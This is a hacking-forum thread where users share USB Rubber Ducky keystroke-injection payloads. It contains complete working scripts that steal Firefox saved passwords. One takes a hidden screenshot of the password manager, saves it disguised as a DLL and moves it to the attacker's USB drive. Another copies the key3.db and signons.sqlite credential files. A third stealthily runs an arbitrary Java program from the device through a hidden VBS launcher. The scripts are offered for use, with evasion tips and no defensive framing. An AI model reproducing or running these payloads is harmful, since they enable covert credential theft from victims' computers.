Jump to content

[Payload] Sharing some payloads!


chickentech
 Share

Recommended Posts

Hey guys & gals-

I'm fairly new to the forum here, but I'm surprised at the number of shared payloads.. Can some of you share your cool scripts? Feel free to generalize server addresses and specifics, but I have to think that there are a lot more out there than are in the github...

I know I would really appreciate it - and I'm sure others would as well. Thanks in advance!!

(and when I finally get something good, I'll be sure to return the favor!)

Link to comment
Share on other sites

Firefox plaintext password stealer

I utilized Overwraith's (?) windows hiding feature and figured the rest out through trial and error. The script tries to be as stealthy as possible about what's happening, but that slows down the run speed from 12s to 15s and to it may look even more suspicious when windows are trying to hide themselves. The Hiding sections are separated with comments so you can remove them rather easily.

The delay times are somewhat strict, you may need to do play with them to make it work on a slower machine.

I went for tab + arrow navigation to make it more suitable for multi-lingual use compared to alt+letter navigation. I had some problems with REM and REPEAT commands (Used the Duck Encoder 2.2 and naked Duck version 2 firmware) so the code has been stripped from the hundreds of DOWNARROW commands.

Things to keep in mind

If firefox starts in full screen mode it won't hide itself. The script however still does what it needs to.

The navigation to settings assumes the browser is using firefox default start page (with six quick navigation icons in the bottom). If the target machine is using custom home-page, for en_US browser change

"Within FF, scroll to settings" to

ALT T
Delay 50
STRING O
DELAY 200

If the passwords saved in firefox are secured with master password, the script simply won't work.

Important

Firefox memorizes the last settings-tab used. AFAIK Ducky can't navigate to a specific tab but it can scroll in between them so make sure settings were closed with the general tab open before running the script. Otherwise you'll end up with an image of language settings or worse.

This is the first bigger one I've made so feedback is appreciated ^_^

The Script

REM I had some problems with the first commands after firmware upgrade so as a lazy solution I run meaningles stuff first
GUI R
DELAY 50
ALT F4
DELAY 50
REM Open firefox
GUI R
DELAY 50
STRING firefox
ENTER
REM FF Load delay: needs to be at least as long as the firefox startup time.
DELAY 500    
DELAY 500
DELAY 500
DELAY 500
REM Hide the window
ALT SPACE
STRING M
DELAY 10
DOWNARROW
REPEAT 100
DELAY 300
ENTER
REM Within FF, scroll to settings
DELAY 300
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
TAB
DELAY 5
ENTER
DELAY 200
REM Hide settings window
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Scroll Security tab and then highlight and open "Saved Passwords..."
LEFTARROW
DELAY 10
LEFTARROW
DELAY 10
LEFTARROW
DELAY 10
SHIFT TAB
DELAY 10
SHIFT TAB
DELAY 10
SHIFT TAB
DELAY 10
SHIFT TAB
ENTER
REM Enable "Show Passwords"
DELAY 200
TAB
DELAY 10
TAB
DELAY 10
TAB
DELAY 10
ENTER
DELAY 100
ENTER
REM Maximize password window and take a print screen
ALT SPACE
DELAY 10
UPARROW
DELAY 10
UPARROW
DELAY 10
ENTER
DELAY 50
PRINTSCREEN
REM Return window-size back to normal, close window, nagivate back to general tab and close settings
ALT SPACE
DELAY 10
ENTER
DELAY 50
ALT F4
DELAY 10
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
LEFTARROW
DELAY 50
ALT F4
DELAY 50
ALT F4
DELAY 50
REM Open paint, paste the image and save it as a DLL lookalike just in case it doesn't disappear from users computer: DLL's are common and not usually opened. Also they won't arouse that much suspicion on attackers USB-drive.
GUI R
DELAY 50
STRING pbrush
DELAY 10
ENTER
DELAY 200
CTRL V
DELAY 200
CTRL S
DELAY 200
STRING %homedrive%\Users\%username%\thumbnails.dll
DELAY 10
ENTER
REM In case file already exists, overwrite
LEFTARROW
ENTER
REM Close paint and take a print screen of desktop to get rid of password-image on clipboard
ALT F4
DELAY 10
PRINTSCREEN
DELAY 10
REM Open CMD-promt and hide it
GUI R
DELAY 10
STRING cmd
DELAY 10
ENTER
DELAY 200
REM Hide the CMD window
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 10
REM Move the file to external media
REM This was a tricky part since it's hard to predict the directory. The script first tries a reasonable prediction for "highest" drive letter on machine (H:\), that was probably assigned to attacker's external media inserted the last.
REM It then reruns the MOVE command scrolling drive letters backwards one by one in the alphabet. If H: doesn't exist, cmd just returns "The system cannot find the drive specified". 
REM If G: does exist, the file is moved there (cmd returns "1 file(s) moved".) and it no longer can be copied on F:, E: or D:. In those cases cmd returns "The system cannot find the file specified".
STRING MOVE /Y %homedrive%\Users\%username%\thumbnails.dll H:
DELAY 50
ENTER
REM Try drive-letter G
DELAY 10
UPARROW
LEFTARROW
BACKSPACE
STRING G
ENTER
REM Try drive-letter F
DELAY 10
UPARROW
LEFTARROW
BACKSPACE
STRING F
ENTER
REM Try drive-letter E
DELAY 50
UPARROW
LEFTARROW
BACKSPACE
STRING E
ENTER
REM Try drive-letter D
DELAY 50
UPARROW
LEFTARROW
BACKSPACE
STRING D
ENTER
REM Exit the cmd
DELAY 10
STRING exit
ENTER
REM Finally, hide what has been written on run... window last time it was used, note that the run history remains 
REM but one rarely bothers to use the drop down menu when hands are all the way away from mouse.
REM The reason I didn't use Overwraith's argumented cmd earlier was this: it looks more suspicious in the drop down menu aswell.
DELAY 10
GUI R
DELAY 10
STRING notepad
DELAY 10
ENTER
DELAY 50
ALT F4
REM When you're done, rename the thumbnails.dll to ffpwd.png (or the name of your choosing) and open the image file.
Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

I did a similar script for OSX and when it comes to firefox, stealing the key3.db and signons.sqlite files seems to be quicker, though the method you use is definitely ingenious. I especially like the saving image file as dll. Very crafty.

This works much better. Huge thanks to You! Here's my script

GUI R
DELAY 100
STRING cmd
ENTER
DELAY 150
STRING cd %homepath%/AppData/Roaming/Mozilla/Firefox/Profiles
ENTER
STRING cd
SPACE
TAB
ENTER
STRING COPY key3.db %homepath%\Contacts
ENTER
STRING COPY signons.sqlite %homepath%\Contacts
ENTER
STRING MOVE /Y %homepath%\Contacts\key3.db G:
ENTER
UPARROW
LEFTARROW
BACKSPACE
STRING F
ENTER
UPARROW
LEFTARROW
BACKSPACE
STRING E
ENTER
UPARROW
LEFTARROW
BACKSPACE
STRING D
ENTER
STRING MOVE /Y %homepath%\Contacts\signons.sqlite G:
ENTER
DELAY 200
UPARROW
LEFTARROW
BACKSPACE
STRING F
ENTER
DELAY 200
UPARROW
LEFTARROW
BACKSPACE
STRING E
ENTER
DELAY 200
UPARROW
LEFTARROW
BACKSPACE
STRING D
ENTER
DELAY 200
STRING exit
ENTER
Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

  • 5 months later...

We should have just one section where people can put their payloads so you don't have to look all over for payloads.

Somebody suggested it once, but nobody ever implemented it.

Wrote this the other night, auto runs a Java class file located on the Ducky SD. Twin duck firmware. Class name is JavaApp, will need renamed to whatever the name of the Java application is. I don't know if Java can even be used for hacking, but it can be used for stuff like making sockets, and directory walking stuff.

REM Author: overwraith
REM Name: Java_Application.txt
REM Purpose: Run a java application off the ducky drive after it mounts.  
REM Encoder V2.4
REM Using the run command for a broader OS base. 
DEFAULT_DELAY 25
DELAY 3000
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

REM Change directories because System32 appears to be protected. 
STRING CD %TEMP%
ENTER

REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER

STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING %DUCKYdrive%
ENTER
STRING cd Java_Application
ENTER
STRING Java JavaApp
ENTER
CONTROL z
ENTER

REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER
Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...